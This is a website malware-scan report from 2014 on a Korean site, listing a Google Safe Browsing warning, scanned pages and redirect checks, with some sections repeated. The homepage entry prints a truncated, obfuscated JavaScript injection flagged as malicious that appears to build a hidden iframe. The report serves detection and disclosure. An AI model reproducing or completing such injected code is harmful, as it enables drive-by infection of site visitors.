Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=insadong.idomz.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://insadong.idomz.net/ | 200 OK Content-Length: 18958 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ncxlxn=document;pyer="spl"+"i"+"t";rkrp=window;drshu="0"+"x";kkhz=(5-3-1);try{--(ncxlxn["body"])}catch(ktjhwa){caqtlt=false;try{}catch(bieqze){caqtlt=21;}if(1){vgr="17:5d:6c:65:5a:6b:60:66:65:17:67:59:69:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:67:59:69:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e Antivirus reports:
| ||
http://insadong.idomz.net/zb/zboard.php?id=schedule | 200 OK Content-Length: 30889 Content-Type: text/html | clean |
http://insainfo.or.kr/images/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8028 Content-Type: application/javascript | clean |
http://zerocounter.com?TVRJek5UWTVPRE0zTVE9PQ==/ | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://zerocounter.com?TVRJek5UWTVPRE0zTVE9PQ==/test404page.js | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://insadong.idomz.net/zb/zboard.php?id=pboard | 200 OK Content-Length: 51150 Content-Type: text/html | clean |
http://insadong.idomz.net/zb/view.php?id=pboard&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=79 | 200 OK Content-Length: 18678 Content-Type: text/html | clean |
http://insadong.idomz.net/zb/download.php?id=pboard&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=79&filenum=1 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://insadong.idomz.net/zb/view.php?id=pboard&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=78 | 200 OK Content-Length: 19229 Content-Type: text/html | clean |
http://insadong.idomz.net/zb/download.php?id=pboard&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=78&filenum=1 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://insadong.idomz.net/zb/view.php?id=pboard&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=77 | 200 OK Content-Length: 19187 Content-Type: text/html | clean |
http://insadong.idomz.net/zb/download.php?id=pboard&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=77&filenum=1 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://insadong.idomz.net/zb/view.php?id=pboard&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=75 | 200 OK Content-Length: 18839 Content-Type: text/html | clean |
http://insadong.idomz.net/zb/download.php?id=pboard&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=75&filenum=1 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://insadong.idomz.net/zb/view.php?id=pboard&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=74 | 200 OK Content-Length: 18654 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: insadong.idomz.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Apr 2014 02:14:15 GMT
Server: Microsoft-IIS/5.0
Content-Type: text/html
X-Powered-By: PHP/4.4.9
GET / HTTP/1.1
Host: insadong.idomz.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Apr 2014 02:14:15 GMT
Server: Microsoft-IIS/5.0
Content-Type: text/html
X-Powered-By: PHP/4.4.9
Second query (visit from search engine):
GET / HTTP/1.1
Host: insadong.idomz.net
Referer: http://www.google.com/search?q=insadong.idomz.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: insadong.idomz.net
Referer: http://www.google.com/search?q=insadong.idomz.net
Result:
The result is similar to the first query. There are no suspicious redirects found.